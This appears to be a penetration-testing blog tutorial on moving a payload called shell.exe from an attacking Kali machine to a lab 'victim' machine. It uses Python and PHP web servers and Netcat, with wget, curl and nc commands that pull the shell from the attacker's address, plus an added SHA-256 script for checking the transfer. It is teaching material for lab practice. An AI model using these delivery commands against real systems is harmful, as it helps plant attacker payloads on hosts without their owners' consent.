Tools used:
Kali OS
Python 2.7 | 3.7
PHP
Netcat
Python SimpleHTTPServer:
We can create a Python HTTP server that serves our payload with a single command. Run it from the directory that holds the file to transfer, since the module serves the current working directory:
root@Pentest-Pundit:~/shells # python -m SimpleHTTPServer 80
or, with Python 3, use the http.server module:
root@Pentest-Pundit:~/shells # python3 -m http.server 80
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxa2TI488bLgeO1-Kqp2Zm9imE-qErjzNMXPqSn1oTquKGRuJoApxADmF0z3_WVoU0glavfM2twPfMr_37LpTjwV5kFVPD8WDPJNqCauIDfCNOh_eZcPTBZ8OxbqlF8eKrnGZEs1wbFn4/d-rw/1-min.png)
On the victim's shell we can use any command-line fetcher such as wget or curl. We boot up another Kali machine with the username kali as the victim machine and run one of the following commands on it to transfer the file.
kali@victim:~$ wget http://192.168.1.80/shell.exe
or
kali@victim:~$ curl http://192.168.1.80/shell.exe --output shell.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgWHc8ME02rgRIeyrICFA8zH37yTOIUFYUS_o9_tBJbDuZN9A4uSYq5TCU2uV49PyY61ollREvqfRtQ5P0k1zKb1J2eZQPZ3vGo_ybuZTU5TC6QJgFdKVvQ6NCAxH4P7rNgCunw3WKCuc/d-rw/2-min.png)
Here we can see the request from the victim PC logged by our Python SimpleHTTPServer.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirOAHMHX2Mh6YJgGRyMKx2RPgoWf96p-_ZLxpkLuZGl1kmdIbWm-RLaN0SNd-LBYsFjHcFmRAE2TNgqvqQDAmbmPPo8EvSZ4ErVGIU5ZQyZ-2csuywvkWApgk0pddZOXawbjNIAtTdhPA/d-rw/3-min.png)
Netcat:
Another quick way to transfer a file is to use Netcat itself as the transfer tool. This helps when the victim already has Netcat installed.
We start a Netcat listener on our attacking Kali machine (Pentest-Pundit) with the file to transfer (the shell) redirected into it with <, as shown below.
root@Pentest-Pundit:~/shells # nc -nlvp 80 < shell.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivizPZDjFpn7pzkNJml1UINMrZhM1pkSEOeAW405i9CwoerhPyacptcG7qLCI08kDKzjsyxXUR3djkrbJp-aEbDDk8mf3omVCDZCwY3F8yXxmyR49jN7aZtYK7jGMFiyqvJ4F_yGtnoEY/d-rw/4-min.png)
We boot up another Kali machine with the username kali as the victim machine. On this machine (victim) we connect to the listener and redirect its output into a file. Netcat reports the connection as open and keeps waiting even after the whole file has been sent, so once the file stops growing we end the transfer with Ctrl-C (^C).
kali@victim:~$ nc -nv 192.168.1.80 80 > shell.exe
(UNKNOWN) [192.168.1.80] 80 (http) open
^C
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3_X_cwCJo9mMreNhoK3ZwU8EYpUwYGFhQZwzzqqh_rfIjZ3E6xyxVRLeyaJjcR7WZwae2a-6URLNhoiL1_LqqHtqbFXscFRB66sOcLH8Pg69kdrAYaX8mxbTVwp1pBpCEboMGbX2ugJo/d-rw/5-min.png)
Because the transfer was ended by hand, we confirm that the file size is the same on the server side and the client side with ls -l.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVnmzeLowvUPVd5DwXtC7onAXcn_V2bM60aulND17h9IcMT9K7g41e9qQwmDKSIB0fdlei3sUsVf6MTiXlwcPRs4QSSdBFcDGEXfXqDEnrXLiA-YPAq1MuYjPQ9iprIUUttuiB_wvC36E/d-rw/6-min.png)
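Comparing sizes with ls catches an obvious truncation but not a corrupted or swapped file. As an added example (not part of the original post), the following POSIX shell script computes a SHA-256 digest on the attacking side and checks the copy on the victim side against it, which works for all three transfer methods on this page. The payload and file names in the demo are constructed for illustration; the script falls back from sha256sum to shasum or openssl depending on what the victim host has installed.

```shell
#!/bin/sh
# Added example (not from the original post): check that a transferred payload
# arrived intact by comparing a SHA-256 digest computed on the attacker side
# with one computed on the victim side. File names and contents below are
# constructed for the demonstration; nothing here is specific to shell.exe.

# Print the SHA-256 hex digest of a file using whichever tool the host has.
# Returns 1 if no hashing tool is available.
file_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    elif command -v shasum >/dev/null 2>&1; then
        shasum -a 256 "$1" | cut -d' ' -f1
    elif command -v openssl >/dev/null 2>&1; then
        openssl dgst -sha256 "$1" | sed 's/^.*= //'
    else
        echo "no SHA-256 tool found" >&2
        return 1
    fi
}

# verify_transfer EXPECTED_HEX FILE
# Prints "ok" and returns 0 if FILE hashes to EXPECTED_HEX; otherwise prints
# a MISSING or MISMATCH line (with both digests and the byte count) and
# returns 1, so it can be used directly in a shell conditional.
verify_transfer() {
    expected="$1"
    file="$2"
    if [ ! -f "$file" ]; then
        echo "MISSING: $file"
        return 1
    fi
    actual=$(file_sha256 "$file") || return 1
    if [ "$actual" = "$expected" ]; then
        echo "ok"
        return 0
    fi
    echo "MISMATCH: expected $expected got $actual ($(wc -c < "$file") bytes)"
    return 1
}

# Demonstration on constructed files: a "payload" on the attacker side, an
# intact copy on the victim side, and a truncated copy that mimics a netcat
# transfer interrupted with Ctrl-C too early.
demo() {
    tmp=$(mktemp -d)
    printf 'MZ fake payload for the demo\n' > "$tmp/shell.exe"   # attacker copy
    expected=$(file_sha256 "$tmp/shell.exe")                     # run on attacker
    echo "attacker digest: $expected"

    cp "$tmp/shell.exe" "$tmp/victim_full.exe"                   # complete transfer
    head -c 10 "$tmp/shell.exe" > "$tmp/victim_truncated.exe"    # cut-off transfer

    verify_transfer "$expected" "$tmp/victim_full.exe"      || true
    verify_transfer "$expected" "$tmp/victim_truncated.exe" || true
    rm -rf "$tmp"
}

demo
```

In practice you run file_sha256 on the attacking machine before starting the server or listener, then run verify_transfer with that digest on the victim after the download; a MISMATCH on a netcat transfer usually means Ctrl-C was pressed before the last bytes arrived.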
PHP built-in Web Server:
We can also use PHP's built-in web server for this task in a single command. The -S option gives the address and port to listen on and -t the document root to serve.
root@Pentest-Pundit:~/shells # php -S 192.168.1.80:80 -t /root/shells/
PHP 7.3.12-1 Development Server started on Tue May 5 01:09:14 2020
Listening on http://192.168.1.80:80
Document root is /root/shells
Press Ctrl-C to quit.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgiGx036EHS-TTnIP8InxWn6Lz8iu5-3CffHxPLCltP-3wjJV3uaEhMOhngI8rKlo7IA5P-vYDAI4D0a-n6ZaXdmIKO4i1ahnSjuTbu1gxojeptzceQyPDQ_Nuke8l3fXKTDUqnZQ3QqjU/d-rw/7-min.png)
On the victim's command shell, we transfer the shell with wget or curl exactly as before.
kali@victim:~$ wget http://192.168.1.80/shell.exe
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrVxu4nhgICesFY-cKgRqBxSCYx6WzPRKfdJb1_qe4rW1Sa1TnHsZiOAOJ-T2YlhRvH1_ZmYR-rS4sq9k2FcAHaDXxlTqvinaWhDmBGScpaByBmRHE_zuCxkygtHdslHo6CGtzjgYKaNg/d-rw/8-min.png)
After the transfer, we can see the request logged by the PHP built-in web server.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiioHZhygYOdfitHzeHEvAEDBQdchz38Mx8610_RgXorXsfm6tTPZ56Wg55QOcY-XPo2JYhDUuzzc5Zo5U1Od9_iPM22UieiznoTzNBTTDZFXi2foy5zjMffpbHgKEw9lGGdf-XcYgnsCY/d-rw/9-min.png)